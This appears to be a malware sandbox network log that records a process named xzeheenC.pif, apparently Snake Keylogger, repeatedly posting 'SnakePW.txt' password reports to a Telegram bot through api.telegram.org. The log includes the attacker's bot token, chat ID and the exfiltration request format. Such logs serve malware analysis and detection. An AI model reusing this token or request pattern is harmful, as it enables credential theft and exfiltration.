                                                                                                        2024-12-18 15:31:23 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 38 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419060,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535883,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        23192.168.2.849735149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:23 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd203dc62b7545
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:23 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 33 64 63 36 32 62 37 35 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd203dc62b7545Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:24 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:24 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:24 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 38 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419062,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535884,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        24192.168.2.849736149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:25 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1fca735ee8c7
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:25 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 63 61 37 33 35 65 65 38 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1fca735ee8c7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:25 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:25 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:25 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 38 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419066,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535885,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        25192.168.2.849737149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:25 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f7bb30cccae
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:25 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 37 62 62 33 30 63 63 63 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1f7bb30cccaeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:25 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:25 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:25 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 38 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419068,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535885,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        26192.168.2.849739149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:25 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd205347cb53af
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:25 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 35 33 34 37 63 62 35 33 61 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd205347cb53afContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:26 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:26 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 517
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:26 UTC517INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 38 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419070,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535886,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        27192.168.2.849740149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:27 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1fe3262ebcfc
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:27 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 65 33 32 36 32 65 62 63 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1fe3262ebcfcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:27 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:27 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 517
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:27 UTC517INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 38 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419072,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535887,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        28192.168.2.849741149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:27 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f9342a18464
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:27 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 39 33 34 32 61 31 38 34 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1f9342a18464Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:28 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:27 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:28 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 38 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419074,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535887,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        29192.168.2.849742149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:27 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2068b658623b
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:27 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 36 38 62 36 35 38 36 32 33 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2068b658623bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:28 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:28 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
